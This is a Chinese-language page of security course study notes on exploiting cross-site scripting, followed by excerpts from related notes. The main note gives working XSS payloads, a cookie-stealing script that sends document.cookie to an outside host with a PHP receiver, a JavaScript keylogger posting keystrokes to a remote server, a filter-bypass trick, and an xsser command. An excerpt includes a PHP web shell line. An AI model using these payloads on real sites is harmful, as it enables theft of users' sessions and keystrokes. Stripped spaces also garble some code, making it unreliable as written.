安全牛学习笔记xss的利用

关键词：

反射型XSS1.概念

通过社会工程学等手段诱骗用户点击某个精心构造的链接,该链接会将恶意的js代码提交给 有漏洞的服务器网站,并由服务器返回给受害者的客户端执行。

2.POC

-<script>alert(‘xss’)</script>
-直接通过脚本插入
-<ahref=‘‘onclick=alert(‘xss‘)>type</a>
-将代码注入到a标签中,点击超链接则执行-<imgsrc=http://1.1.1.1/a.ipgonerror=alert(‘xss‘)> -将代码注入到img标签中,加载出错时执行-<script>window.location=‘http://1.1.1.1‘</script>
-重定向
-<iframeSRC="http://1.1.1.1/victim"height="0"width="0"></iframe> -加载一个宽和高都是0的框架来执行代码-<script>newImage().src="http://1.1.1.1/c.php?output="+document.cookie;</script> -窃取cookie并发送到指定网址-<script>document.body.innerHTML="<divstyle=visibility:visible;><h1>THISWEBSITE

ISUNDERATTACK</h1></div>";</script> -修改DOM树中的内容

3.窃取cookiejs代码 cookie.js

varimg=newImage(); img.src="http://1.1.1.1/cookies.php?cookie="+document.cookie;

接收页面代码cookies.php

<?php
$c=$_GET[‘c‘]; $cookie=fopen("cookie.txt","a"); fwrite($cookie,$c." "); fclose($cookie);
echo"success"
?>

恶意代码

<scriptsrc=http://1.1.1.1/cookie.js></script> 

攻击过程:

当恶意代码被执行时,会从外部网址读取cookie.js在客户端上执行,该js会读取当前页面的 地址并发送到指定的接收页面,由页面接收并保存到文件。

4.keylogger键盘记录js keylogger.js

document.onkeypress=function(evt){
evt=evt||window.event
key=String.fromCharCode(evt.charCode)
if(key){
varhttp=newXMLHttpRequest();
varparam=encodeURI(key) http.open("POST","http://192.168.20.8/keylogger.php",true); http.setRequestHeader("Content-type","application/x-www-form-urlencoded"); http.send("key="+param);

} }

接收页面 Keylogger.php

<?php
$key=$_POST[‘key‘]; $logfile="keylog.txt"; $fp=fopen($logfile,"a"); fwrite($fp,$key); fclose($fp);
?>

恶意代码

<script+src="http://1.1.1.1/keylogger.js"></script>

攻击过程:当恶意代码被执行时,会从外部网址读取keylooger.js在客户端上执行,该js记录所有该页面 上的按键操作并发送到指定的接收页面,由页面接收并保存到文件。

5.xss漏洞检测工具:xsser

xsser-u“http://1.1.1.1/dvwa/vulnerabilities/"-g"xss_r/?name="--cookie="securi ty=low;PHPSESSID=d23e469411707ff8210717e67c521a81"-s-v--reverse-check检测xss漏洞
--heuristic检查被过滤的字符

6.过滤绕过

过滤机制:替换<script>字符为""绕过方法:在<script>中嵌套一层<script>--<scr<script>ipt>

存储型XSS1.概念

将恶意js代码永久的存储在有漏洞的服务器上,每次受害者打开该页面时,恶意代码便会在 客户端执行。

2.表单长度限制突破只在客户端过滤且服务器没有很的过滤机制时:

  直接修改客户端源码改变表单长度
  通过截断代理直接在数据包中修改需要提交的内容

安全牛学习笔记xss-简介跨站脚本检测和常见的攻击利用手段

XSS攻击WEB客户端客户端脚本语言  弹窗警告、广告  Javascript  在浏览器中执行XSS(cross-sitescripting)  通过WEB站点漏洞，向客户端交付恶意脚本代码，实现对客户端的攻击目的  注入客户端脚本代... 查看详情

安全牛学习笔记xss的简述

1.CrossSiteSCripting 攻击者往Web页面里插入恶意Script代码,当用户浏览该页时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 2.xss漏洞类型 反射型存储型DOM型 3.用途 键盘记录盗取... 查看详情

安全牛学习笔记反射型xss攻击漏洞的原理及解决办法

...避免&修复漏洞直接将用户数据输出到浏览器，没有做安全处理搜索：[email protected]:~/controller$vimsearchController.class.php<?phpclasssecrchControllerextendsbaseController{ 查看详情

安全牛学习笔记存储型xss漏洞原理及修复方法

存储型XSS 漏洞的原理及修复方法 1.常见的触发场景2.漏洞原理3.漏洞危害4.一些tips5.如何避免&修复漏洞[email protected]:~/controller$vimmissionController.class.php<?phpclassmissionControllerextendsbaseController{ public$va 查看详情

安全牛学习笔记xss-键盘记录器和反射型xss

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋┃XSS                         &nb 查看详情

安全牛学习笔记手动漏洞挖掘

手动漏洞挖掘身份认证  常用弱口令/基于字典的密码破爆破  锁定账号  信息收集    手机号    密码错误提示信息  密码嗅探手动漏洞挖掘会话sessionID  Xss/cookieimpo... 查看详情

安全牛学习笔记手动漏洞挖掘

手动漏洞挖掘身份认证  常用弱口令/基于字典的密码破爆破  锁定账号  信息收集    手机号    密码错误提示信息  密码嗅探手动漏洞挖掘会话sessionID  Xss/cookieimpo... 查看详情

安全牛学习笔记利用配置不当提权

┃利用漏洞提权┃Ubuntu11.10 ┃http://old-releases.ubuntu.com/releases/11.10/┃gcc ┃sudoapt-cdromadd&&sudoapt-getinstallgcc┃gcc18411.c-oexp ┃CVE-2012-0056 ┃/proc/pid/mem┃kernels>=2 查看详情

安全牛学习笔记收集敏感数据隐藏痕迹

 收集敏感数据、隐藏痕迹利用配置不当提权    应用系统的配置文件    应用连接数据库的配置文件基本信息收集    Linux    /etc/resolv.conf    /etc/pa 查看详情

安全牛学习笔记手动漏洞挖掘

手动漏洞挖掘本地文件包含lfi  查看文件  代码执行    <?phpechoshell_exec($_GET['cmd']);?>    Apacheaccess.log远程文件包含rfi  出现概率少于lfi，但更容易被利用& 查看详情

安全牛学习笔记​手动漏洞挖掘

手动漏洞挖掘本地文件包含lfi  查看文件  代码执行    <?phpechoshell_exec($_GET[‘cmd‘]);?>    Apacheaccess.log远程文件包含rfi  出现概率少于lfi，但更容易被利用 &nb 查看详情

web安全学习笔记xss漏洞分析上

Web安全学习笔记XSS上繁枝插云欣——ICML8XSS的分类和基本认识XSS的危害同源策略的基本认识一.XSS的分类和基本认识1.简介XSS全称为CrossSiteScripting，为了和CSS分开简写为XSS，中文名为跨站脚本。该漏洞发生在用户端，是指在渲染过... 查看详情

安全牛学员笔记存储型xss和beef浏览器攻击框架

存储型XSS                                &n 查看详情

安全牛学习笔记漏洞挖掘

漏洞本质   数据与指令的混淆  对用户输入信息过滤不严,误将指令当做数据 漏洞挖掘原则 所有变量所有头 cookie中的变量逐个变量删除筛选 身份认证 弱口令/基于字典的爆破 ... 查看详情

安全牛学习笔记burpsuite

BurpsuiteWeb安全工具中的瑞士军刀统一的集成工具发现全部现代WEB安全漏洞PortSwigger公司开发  BurpFree  BurpProfessional  http://www.portswigger.net所有的工具共享一个能处理并显示HTTP消息的可扩展框架,模块之间无缝交... 查看详情

​安全牛学习笔记操作系统识别

该笔记为安全牛课堂学员笔记，想看此课程或者信息安全类干货可以移步到安全牛课堂Security+认证为什么是互联网+时代最火爆的认证？    牛妹先给大家介绍一下Security+    Security+认证是一种中立第... 查看详情

安全牛学习笔记http特点

1.web页面分类动态web     应用    数据库    根据用户的输入返回不同的结果 静态web2.web攻击面 NetworkOSWEBServerAppserverWebApplicationDatab 查看详情

安全牛学习笔记http协议

http协议基础 1.HTTP概述众所周知，Internet的基本协议是TCP/IP协议，目前广泛采用的FTP、ArchieGopher等是建立在 TCP/IP协议之上的应用层协议，不同的协议对应着不同的应用。HTTP(HyperTextTransferProtocol-超文本传输协议)是一... 查看详情